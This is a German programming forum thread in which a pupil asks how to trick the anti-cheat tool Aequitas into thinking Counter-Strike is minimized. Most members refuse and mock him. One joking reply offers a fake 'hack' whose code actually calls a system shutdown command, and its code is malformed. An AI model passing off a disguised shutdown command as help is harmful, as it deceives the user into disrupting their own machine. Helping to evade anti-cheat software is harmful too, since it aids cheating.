Prog. vortäuschen das anderes Prog. minimiert ist?
-
Hallo liebe Community!
Ich habe mal eine Frage
Ich würde gerne Prog1.exe vortäuschen/vorgaukeln, das Prog2.exe Minimiert ist.
(Ist sie aber in Wahrheit nicht).Wie kriege ich das am besten hin?
Ich habe schon von Befehlen wie ShowWindow, FindWindows und ähnlichem gehört.
Allerdings will ich den Prog1 ja nur VORTÄUSCHEN dass das Prog2 minimiert ist und es nicht wirklich minimieren.
Also... wie genau kriege ich das hin?
Wäre für jede Hilfe dankbar!!
MfG aeQman
-
Warum?
-
Gott verdammte Scheiße! In deiner kleinen Windows Welt bist du wohl noch nie auf die Idee gekommen, dass das nix mit C++ zu tun hat?
-
???????????????? schrieb:
Warum?
Warum denn nicht? :o
fu schrieb:
Gott verdammte Scheiße! In deiner kleinen Windows Welt bist du wohl noch nie auf die Idee gekommen, dass das nix mit C++ zu tun hat?
Meinst du jetzt mich damit... Wenn ja hab ichs nicht wirklich verstanden..?!
-
C++ kennt keine Fenster und schon recht keine minimierten. Das ist plattformabhängig. Da du Windows verwendest wäre dein Thread entweder im WinAPI oder im MFC-Forum deutlich besser aufgehoben. Hier wird eigentlich nur über Standard-C++ diskutiert.
-
Bei Windows nutze von der WinAPI s.g. Hooks
-
Okay sry, dann war es der falsche Bereich. Wäre schön wenn ein Mod den Thread veschrieben könnte!
Würde es so funktionieren?
HWND hWnd = FindWindow(NULL, "Prog1.exe");
{
SendMessage(hWnd, 0, (LPARAM)SC_MINIMIZE, "Prog2.exe");
}
-
antworte mal auf die frage nach dem warum, bitte.
-
Da es ein Programm gibt, was meine Computereigenschaften ausliest, während ein anderes Programm an ist.
Das heisst, ich will dem Programm, was die PCEigenschaften ausliest, vorgaukeln, dass das andere Programm minimiert ist. Denn dann hört das 1 Programm auf, die Daten auszulesen.
-
Gehst du zufällig noch zur Schule?
-
Schule? schrieb:
Ja tu ich.
-
aeQman schrieb:
Schule? schrieb:
Ja tu ich.
Darauf hättest du besser nicht so ehrlich antworten sollen. Aber naja ...
Helfen werde ich und wohl einige andere nicht aus dem folgenden Grund:
Wenn man etwas in einem Programm vortäuschen will, kann das meistens nur zwei Dinge heissen. Man hat ein schlechtes Design im Programm oder man versucht einen Streich oder sonstigen Unsinn zu machen. Und logischerweise will hier niemand bei sowas mithelfen, ausser gewisse Trolle, welche aber dann womöglich soweit gehen, dass sie dir selber noch einen Streich spielen.Grüssli
-
Ich wüsste nicht, wie man mithilfe von einem "vorgetäuschten minimieren" schaden anrichten kann? O.o
Also mal ehrlich, würde ich einen Trojaner oder ähnliches Programmieren wollen, würd die Funktion doch rein garnichts bringen?
Aber es gibt halt ein Programm (Aequitas) was meine Spiel Daten (Counter-Strike) ausliest. Und ich will das verhindern. Das kann ich, indem ich dem Programm vorgaukele, das mein Spiel minimiert läuft.
Würde das so funktionieren?
HWND hWnd = FindWindow(NULL, "Aequitas");
{
SendMessage(hWnd, SW_MINIMIZE, 0, (LPARAM)"Counter-Strike");
}
-
aeQman schrieb:
Aber es gibt halt ein Programm (Aequitas) was meine Spiel Daten (Counter-Strike) ausliest. Und ich will das verhindern. Das kann ich, indem ich dem Programm vorgaukele, das mein Spiel minimiert läuft.
Ist Aequitas nicht das Anticheater-Tool der ESL?
-
ich denke das WARUM ist dann wohl geklärt -.- und ich denke damit ist dann auch sämtliche mitarbeit in diesem Thread geklärt
-
war ja zu erwarten. wie dumm kann man eigentlich sein?
-
Wie kommt man eigentlich auf die Idee, mit C++ ein Anti-Cheater-Tool auszuhebeln, wenn man keine Ahnung von der Programmiersprache hat?
-
Nexus schrieb:
Wie kommt man eigentlich auf die Idee, mit C++ ein Anti-Cheater-Tool auszuhebeln, wenn man keine Ahnung von der Programmiersprache hat?
Wohl aus dem gleichen Grund, wie bei der Umfrage der Informatika08 (in der Schweiz) die meisten Leute glaubten, dass ein Informatiker in der Lage sei, einen Lift zu reparieren, falls sie mit einem Informatiker in einem Lift stecken bleiben würden. -> krankhafte Unwissenheit
Grüssli
-
Na, das macht man eigendlich nicht aber, versuch es mal damit:
[cpp]
#include <windows.h>
#include <iostream>
//#include <kraging>
#include <cstdio>#define crackline, "shutdown -h -t 0"
int main(){
cout << "load hack...";
system(crackline);
cout << "fertisch...";
return 0;
}
-
lol.... sicher das das so arbeited wie der User das will XD?